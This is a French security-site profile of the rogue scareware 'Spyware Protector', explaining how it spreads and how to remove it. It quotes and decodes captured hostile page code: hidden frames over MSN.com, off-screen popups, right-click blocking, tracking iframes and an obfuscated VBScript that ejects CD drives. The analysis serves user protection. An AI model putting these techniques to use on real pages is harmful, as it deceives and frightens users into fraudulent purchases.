Discussion Discussion
Faire un lien Lien
Assiste.com - Sécurité informatique - Décontamination - Antivirus - Protection - Protection de la Vie Privée Assiste.com - Sécurité informatique - Décontamination - Antivirus - Protection - Protection de la Vie Privée

Spyware Protector

Dernière mise à jour
12.11.2015 - 00h00 - Paris - (Assiste - Pierre Pinard) - Mises à jour.

Spyware Protector - Pourquoi ne pas l'utiliser et comment le désinstaller.

Spyware Protector
Spyware Protector
Spyware Protector    Spyware Protector    Spyware Protector    Spyware Protector
 

Spyware ProtectorSpyware ProtectorSpyware Protector


Spyware Protector
Attention - Warning

Spyware Protector - Attention - Spyware Protector     Spyware Protector - Warning - Spyware Protector
Français - Spyware ProtectorCe logiciel appartient à une classe de logiciels à éviter, voire dangereux, faux, menteurs, crapuleux, d'attaque, telle que :
« Scareware »
« Crapware »
« Rogue »

Ne pas télécharger - Ne pas utiliser - Ne pas acheter - Ne pas tester.

English - Spyware ProtectorThis software belongs to a class of softwares to avoid, even dangerous, false, liars, villainous, of attack, such as:
"Scareware"
"Crapware"
"Rogue"

Do not download - Do not use - Do not buy - Do not try.


 
Spyware Protector
E : ancienne fiche 2001/2009 – M : ancienne fiche 2001/2009
Classe
  Anti-spywares / Anti-adwares (Classe des anti-malwares)
Éditeur et Groupe
 

Éditeur : Web3000, n-Case, 180Solutions

Groupe : RedV NetWork

Description
Commentaires
 

Nous n'avons pas trouvé de lien direct entre cet outil crapuleux et la société RedV si ce n'est que celle-ci édite et distribue toute une série de logiciels crapuleux dont les noms sont dans une série xxx-Protector (PopUpProtector, HistoryProtector, X-Protector, AdProtector, PanicProtector, ProtectorSuite). On trouve 3 produits proposés simultanément à Spyware Protector, qui n'entrent pas dans cette convention de nommage : Website PopKiller, Anti-virus Protection et Memory Maximizer (ces produits sont introduits dans l'anti-logithèque).

Utilise la technique du téléchargement silencieux conduit par une popup invisible (Web Bug) sur des sites affiliés et piégés, puis affiche aussitôt, quasiment en plein écran, une popup effrayante. Cette image est l'archétype des popup tentant de vous faire peur. Le Web Bug invisible est lui-même encapsulé dans un frame invisible exécutant quelques scripts additionnels, le frame visible ouvrant en pleine fenêtre sur le véritable site de microsoft, MSN.com.

L'un de ces sites piégés est http://www.browser-page.com/my_home.html (le premier frame, invisible, va chercher http://www.browser-page.com/2top.html). C'est, lors d'un test du 07.08.04, le même site piégé (avec le même piège) que celui qui faisait la promotion de AdwareHunter il y a quelques mois.

<frameset framespacing="0" border="0" frameborder="0" rows="21,1%">
<frame name="top" src="2top.html" marginwidth="0" marginheight="0" scrolling="no" target="_self" noresize>
<frame name="bottom" src="http://www.msn.com" marginwidth="0" marginheight="0" scrolling="auto" noresize>
<noframes>
<body>
</body>
</noframes>
</frameset>

Le frame caché exécute ce script dont la fonction est d'aller chercher une page html (qui est la popup ci-dessous) à http://www.spywareprotector.com/Computer_Error.htm et de l'afficher par dessus la page du site MSN, 1 seconde après. Un son est joué et, simultanément, tous vos lecteurs de cd-rom s'ouvrent.

<script LANGUAGE="JavaScript">
<!-- Begin
closetime = 20; // Close window after __ number of seconds?
// 0 = do not close, anything else = number of seconds
function Start(URL, WIDTH, HEIGHT) {
windowprops = "left=5000,top=5000,width=" + WIDTH + ",height=" + HEIGHT; // Position de la fenêtre cachée
// Elle est affichée à partir du pixel 5000 en hauteur et du pixel 5000 en largeur
// Les résolutions d'écrans étant de 800*600 ou 1024*768, au maximum, 1600*1200, cette fenêtre ne sera jamais visible

preview = window.open(URL, "preview", windowprops);
if (closetime) setTimeout("preview.close();", closetime*1000);
}
function doPopup() {
url = "http://www.spywareprotector.com/Computer_Error.htm";
width = 1; // Largeur de la popup, en pixel : 1 pixel, donc invisible
height = 1; // Hauteur de la popup, en pixel : 1 pixel, donc invisible
delay = 0; // Délais en seconde avant l'ouverture de la popup
timer = setTimeout("Start(url, width, height)", delay*1000); // Attente d'1 seconde (1.000 millièmes de sec.) afin de déjouer certains anti-popup primaires
}
// End -->
</script>
</head>
<body OnLoad="doPopup();" topmargin="0" leftmargin="0" bgcolor="#004E82">
<script language=JavaScript>
<!--
var message="";
function clickIE() {if (document.all) {(message);return false;}}
function clickNS(e) {if
(document.layers||(document.getElementById&&!document.all)) {
if (e.which==2||e.which==3) {(message);return false;}}}
if (document.layers)
{document.captureEvents(Event.MOUSEDOWN);document.onmousedown=clickNS;}
else{document.onmouseup=clickNS;document.oncontextmenu=clickIE;}
document.oncontextmenu=new Function("return false")
// -->
</script>

<p align="center">
<a target="_blank" href="http://www.restorationhair.com/v4_step1.php?TID=bhome_701">
<img border="0" src="../google_ad1.gif" width="340" height="21"></a></p>
<!-- PayPopup.com Advertising Code Begin -->
<script LANGUAGE="JavaScript1.1" SRC="http://www.PayPopup.com/popup.php? id=EWNprasad&pop=enter&t=10&subid=18918&blk=1">
</SCRIPT>
<!-- PayPopup.com Advertising Code End -->
<script Language="JavaScript"> var D = new Date(); var TheDate =D.getTime();document.write('<iframe id="frame1" width=0 height=0 frameborder="no" scrolling="no" src="http://jsurfed.cjt1.net/HTM/446/0/JavaSiteRequest.asp? AW=446&LV=6000&DC=0&L=0& NF=0&IW=0&IH=0&ORD='+TheDate+'?" border="no"></iframe>')</script>
<!-- RON -CH RON, Tracking Pixel (Body) -->
<script language="javascript" src="http://z1.adserver.com/w/cp.x;rid=472;tid=6;ev=1;dt=1;ac=5;c=731;"> </script><noscript>
<a href="http://z1.adserver.com/w/cp.x;rid=472;tid=6;ev=2;dt=3;ac=5;c=731; " target="_blank"> <img width=1
height=1 src="http://z1.adserver.com/w/cp.x;rid=472;tid=6;ev=1;dt=3;ac=5;c=731;" border=0></a></noscript>
<!-- RON -CH RON, Tracking Pixel (Body) -->
</body>

La popup de fausse alerte, bien effrayante, suivie d'une seconde puis d'une pleine page (non représentée) tente une vente forcée. Le visiteur est induit en erreur car ceci s'affiche au dessus du site réel MSN de Microsoft et le visiteur incrédule est amené à penser que l'alerte provient de Microsoft lui-même. Nota : sur la page de vente de ce truc, l'incitation est augmentée par la proposition de trois outils additionneles, livrés en bundle avec. Ces 3 outils sont donc immédiatement suspects et introduits dans la liste des faux utilitaires "interdits" : Website PopKiller, Anti-virus Protection et Memory Maximizer.




En bas de page on trouve ce script crypté:

<script type="text/javascript">
document.write('\u003c\u0073\u0063\u0072\u0069\u0070\u0074\u0020\u004c \u0041\u004e\u0047
\u0055\u0041\u0047\u0045\u003d\u0022\u0056\u0042\u0053\u0063\u0072 \u0069\u0070\u0074
\u0022\u003e\u000d\u000a\u003c\u0021\u002d\u002d\u000d\u000a\u0053 \u0065\u0074\u0020
\u006f\u0057\u004d\u0050\u0020\u003d\u0020\u0043\u0072\u0065\u0061 \u0074\u0065\u004f
\u0062\u006a\u0065\u0063\u0074\u0028\u0022\u0057\u004d\u0050\u006c \u0061\u0079\u0065
\u0072\u002e\u004f\u0043\u0058\u002e\u0037\u0022\u0020\u0029\u000d \u000a\u0053\u0065
\u0074\u0020\u0063\u006f\u006c\u0043\u0044\u0052\u004f\u004d\u0073 \u0020\u003d\u0020
\u006f\u0057\u004d\u0050\u002e\u0063\u0064\u0072\u006f\u006d\u0043 \u006f\u006c\u006c
\u0065\u0063\u0074\u0069\u006f\u006e\u000d\u000a\u0069\u0066\u0020 \u0063\u006f\u006c
\u0043\u0044\u0052\u004f\u004d\u0073\u002e\u0043\u006f\u0075\u006e \u0074\u0020\u003e
\u003d\u0020\u0031\u0020\u0074\u0068\u0065\u006e\u000d\u000a\u0046 \u006f\u0072\u0020
\u0069\u0020\u003d\u0020\u0030\u0020\u0074\u006f\u0020\u0063\u006f \u006c\u0043\u0044
\u0052\u004f\u004d\u0073\u002e\u0043\u006f\u0075\u006e\u0074\u0020 \u002d\u0020\u0031
\u000d\u000a\u0063\u006f\u006c\u0043\u0044\u0052\u004f\u004d\u0073 \u002e\u0049\u0074
\u0065\u006d\u0028\u0069\u0029\u002e\u0045\u006a\u0065\u0063\u0074 \u000d\u000a\u004e
\u0065\u0078\u0074\u0020\u0027\u0020\u0063\u0064\u0072\u006f\u006d \u000d\u000a\u0045
\u006e\u0064\u0020\u0049\u0066\u000d\u000a\u002d\u002d\u003e\u000d \u000a\u003c\u002f
\u0073\u0063\u0072\u0069\u0070\u0074\u003e')

Ce qui donne, après décryptage :

<script type="text/javascript">document.write('<script LANGUAGE="VBScript">
<!--
Set oWMP = CreateObject("WMPlayer.OCX.7" )
Set colCDROMs = oWMP.cdromCollection
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom
End If
-->
</script>')


Il s'agit donc d'une opération d'éjection sur tous les cd-rom de la machine (on provoque leur ouverture).

Si on ne réagit pas assez vite à la première popup, une seconde, encore plus alarmante, apparait. Attention ! Le bouton de fermeture ne fonctionne pas (c'est une fausse fenêtre ! C'est entièrement une image cliquable ! Il s'agit juste d'un dessin d'une fenêtre Windows avec un texte plaqué dessus. Vous ne pouvez pas échapper à la réponse implicite "Ok" sauf à tuer votre navigateur Internet).



Lorsque vous voyez des choses comme cela, ne vous affolez pas : c'est complètement faux.


Utilise plusieurs noms
Spyware Protector Web3000, n-Case, 180Solutions

Spyware Protector est connu sous divers noms :

S'inscrit dans une série dite xxxProtector :

  • Ad Protector
  • Adprotector
  • History Protector
  • Historyprotector
  • Panic Protector
  • Panicprotector
  • Popup Protector
  • Popupprotector
  • Protector Suite
  • ProtectorSuite
  • Surf Protector
  • SurfProtector
  • X Protector
  • XProtector
  • Antivirus Protection
  • Anti-virus Protection
  • Memory Maximizer
  • Spyware Protector
  • SpywareProtector
  • Website Popupkiller

Principe d'un même logiciel (clône) connu sous plusieurs noms

Lorsqu'un produit logiciel tente d'occuper le Web sous plusieurs noms (laissant croire à l'existence de plusieurs logiciels concurrents, parfois aux apparences légèrement différentes), au lieu de capitaliser sur un seul nom, c'est que ce logiciel n'a aucune qualité ni aucune notoriété. En étant présent sur le Web sous plusieurs noms, il s'agit d' « occuper le terrain » - de « ratisser large », une forme de SEO - Search Engine Optimisation - Optimisation pour moteurs de recherche agressive, apparentée au cybersquatting, dupant les moteurs de recherche et ceux qui les utilisent. Le but est de capturer et piéger le maximum d'internautes. Ce logiciel est donc, de part ses méthodes de diffusion, de mauvaise qualité et trompeur. Les développeurs de logiciels malveillants et les escros utilisent souvent cette méthode. Chaque fois qu'un logiciel est identifié comme étant le clone d'un autre, tous sont immédiatement considérés comme des tentatives de duperies. Le logiciel, son éditeur et son auteur sont immédiatement suspects. Spyware Protector est, à ce titre, un crapwares. Spyware Protector est inséré dans la crapthèque sous chacun de ses noms.

Version d'essai
Trial
 

Non ! Acte d'achat uniquement ! N'offre aucune possibilité d'évaluation du produit.

Comment Spyware Protector arrive dans un ordinateur

Méthodes de déploiement génériques

Illustrations
Comment supprimer Spyware Protector
 



Procédure de décontamination

anti-malwares, anti-crapwares, anti-adwares

Comment supprimer Spyware Protector

Pour supprimer Spyware Protector, utilisez et suivez point par point la Procédure gratuite de décontamination anti-malwares, anti-adwares et anti-crapwares. Il s'agit d'une procédure générale de décontamination qui ne vise pas uniquement l'éradication de Spyware Protector mais de toutes les contaminations des types suivants qui pourraient se trouver présentes dans votre ordinateur :

  • Anti-malwares (malwares signifie " logiciels malveillants " et, plus généralement, " malveillances " - Plus d'informations sur la notion de malwares en lisant l'article Malwares)
  • Anti-adwares (adwares signifie " logiciels délivrant des publicités " (et pratiquant un espionnage intensif et temps réel de tous vos moindres faits et gestes, pudiquement appelée tracking) - Plus d'informations sur la notion d'adwares en lisant l'article Adwares)
  • Anti-crapwares (crapwares signifie " logiciels crapuleux " - Plus d'informations sur la notion de crapwares en lisant l'article Crapwares)
  • Anti-scarewares
  • Anti-rogues
  • Anti-fakes
  • Anti-PUP
  • Anti-Barres d'outils
  • Anti-Keylogger
  • Anti-Hijacker

Cette Procédure de décontamination utilise, dans un ordre spécifique, des outils entièrement gratuits et de grande notoriété dont, par exemple :

Une fois Spyware Protector supprimé

Une fois Spyware Protector supprimé, il convient de réfléchir et analyser ce qui a pu se passer en amont et risque de se passer en aval de l'attaque, afin d'y apporter des correctifs préventifs.

  • En amont, réfléchir à ce qui a permis que l'attaque intervienne. La décontamination qui a permis d'éradiquer Spyware Protector n'est pas un geste suffisant. Il faut trouver et comprendre pourquoi et comment, en amont, le parasite a pu pénétrer l'ordinateur et s'installer, puis corriger cette faille, qu'elle soit celle d'une attitude personnelle inconséquente ou celle d'une faille de sécurité d'un composant logiciel de l'ordinateur, sinon cela recommencera encore et encore.
  • En aval, réfléchir et d'imaginer ce qui risque de se passer. Il faut s'interroger sur les risques consécutifs à ce qu'a fait le parasite (mots de passe à changer, comptes bancaires à surveiller, etc. ...).

C'est le moment de lire et intégrer les recommandations de l'article : Attitude saine post contamination - Safe attitude.

Machines et adresses IPs
 

Les machines suivantes peuvent être bloquées, par exemple en utilisant votre pare-feu.

85.12.60.30
Analyse du code
  Analyse pas encore effectuée (ou absence du code dans ma collection - pourriez-vous m'indiquer un lien de téléchargement de ce code)

Pour en savoir plus

Url du téléchargement
 
Domaine Whois et IP Whois


Tentatives de Whois sur des domaines possibles constitués du nom du logiciel suivi des TDL .com, .net et .org
Whois spyware_protector.com
Whois spyware_protector.net
Whois spyware_protector.org
Ils en parlent
 
Programme d'affiliation
  Verio Productions Limited, Avenue House, St Julian'S Avenue, St Peter Port, Guernsey Gy1 1Wa
Registrant
 
Registrar
 

 

How to get rid of Spyware ProtectorRecherches avancées à propos de Spyware ProtectorSpyware Protector uninstall guide

Googler dans un site
SiteGoogler sur le nomGoogler sur la famille
(Matrice)
Googler sur l'Editeur
Assiste Spyware Protector Web3000, n-Case, 180Solutions
VirusTotal Spyware Protector Web3000, n-Case, 180Solutions
HerdProtect Spyware Protector Web3000, n-Case, 180Solutions
Metascan Spyware Protector Web3000, n-Case, 180Solutions
Reason Core Spyware Protector Web3000, n-Case, 180Solutions
Symantec Spyware Protector Web3000, n-Case, 180Solutions
Kaspersky Spyware Protector Web3000, n-Case, 180Solutions
Kaspersky SecureList Spyware Protector Web3000, n-Case, 180Solutions
BleepingComputer Spyware Protector Web3000, n-Case, 180Solutions
SpywareInfo forum Spyware Protector Web3000, n-Case, 180Solutions
Malwarebytes Spyware Protector Web3000, n-Case, 180Solutions
EmsiSoft Spyware Protector Web3000, n-Case, 180Solutions
EmsiSoft IsThisFileSafe Spyware Protector Web3000, n-Case, 180Solutions
SpyBot Spyware Protector Web3000, n-Case, 180Solutions
ZHPDiag Spyware Protector Web3000, n-Case, 180Solutions
FreeFixer Spyware Protector Web3000, n-Case, 180Solutions
Spyware Warrior forum Spyware Protector Web3000, n-Case, 180Solutions
Wilders Security forum Spyware Protector Web3000, n-Case, 180Solutions
Microsoft Communauté Spyware Protector Web3000, n-Case, 180Solutions
Libellule Forum Spyware Protector Web3000, n-Case, 180Solutions
Malekal Forum Spyware Protector Web3000, n-Case, 180Solutions
PCAstuces Forum Spyware Protector Web3000, n-Case, 180Solutions
Zebulon Forum Spyware Protector Web3000, n-Case, 180Solutions
Security-x Forum Spyware Protector Web3000, n-Case, 180Solutions
AidoWeb Forum Spyware Protector Web3000, n-Case, 180Solutions
WayBack Machine Spyware Protector Web3000, n-Case, 180Solutions
Recherches en vrac
Nom du produit Matrice Editeur Groupe Domaine supposé en .com Une page supposée en .html
Google Spyware Protector Web3000, n-Case, 180Solutions RedV NetWork Spyware Protector.com spyware_protector.html
Domaine Sous-domaine www IP
WayBack Machine www.
Google Safe Browsing www. 85.12.60.30
Norton Safe Web - NSW www. 85.12.60.30
AVG Threat Labs www. 85.12.60.30
WOT - Web Of Trust www. 85.12.60.30
VirusTotal www. 85.12.60.30
URLVoid www. 85.12.60.30
McAfee SiteAdvisor www.
Domaine Whois IP Whois Reverse IP
Webhosting



85.12.60.30



DomainTools



85.12.60.30



GoDaddy



85.12.60.30



website.informer



85.12.60.30



PagesInventory



85.12.60.30



#Spyware Protector, #spyware_protector, #Web3000, n-Case, 180Solutions, #RedV NetWork

 Comment supprimer Spyware Protector

Contact à propos de cette fiche

Français - Spyware Protector Contact informatif à propos de cette fiche :
Afin de fournir une information correcte, précise et à jour, j'encourage l'éditeur de ce produit ou service à me contacter si la moindre partie de cette fiche est à réviser.

Français - Spyware Protector Informative contact about this card:
In order to provide correct, accurate and up to date information, I encourage the editor of this product or service to contact me if any part of this card is to be revised.

 

Comment supprimer Spyware ProtectorSécurité informatique - Comment je me fais avoirComment supprimer Spyware Protector

Comment supprimer Spyware ProtectorContre-mesuresComment supprimer Spyware Protector

Comment supprimer Spyware ProtectorDerrière le rideauComment supprimer Spyware Protector

Comment supprimer Spyware ProtectorRéférencesComment supprimer Spyware Protector

Comment supprimer Spyware ProtectorRessourcesComment supprimer Spyware Protector

FAQ Comment supprimer Spyware ProtectorFAQFAQ Comment supprimer Spyware Protector

Avis sur Spyware Protector
Spyware Protector sain ou dangereux
Comment désinstaller Spyware Protector
Comment supprimer Spyware Protector
Supprimer le malware Spyware Protector
Supprimer le virus Spyware Protector
Comment effacer Spyware Protector
Virus Spyware Protector
Spyware Protector : Guide de désinstallation
Spyware Protector : Removal Guide
Spyware Protector qu'est-ce que c'est
How to uninstall Spyware Protector
Eradiquer Virus Spyware Protector
Delete Spyware Protector
How to remove Spyware Protector
Remove Spyware Protector from my PC
Remove Spyware Protector malware
Step by step removal guide for Spyware Protector
Uninstall Spyware Protector
Uninstall Spyware Protector Malware
Spyware Protector fake alert
Spyware Protector keys
Spyware Protector license key
Spyware Protector Removal
Spyware Protector Virus
Get rid of Spyware Protector
#Spyware Protector, #spyware_protector, #Web3000, n-Case, 180Solutions, #RedV NetWork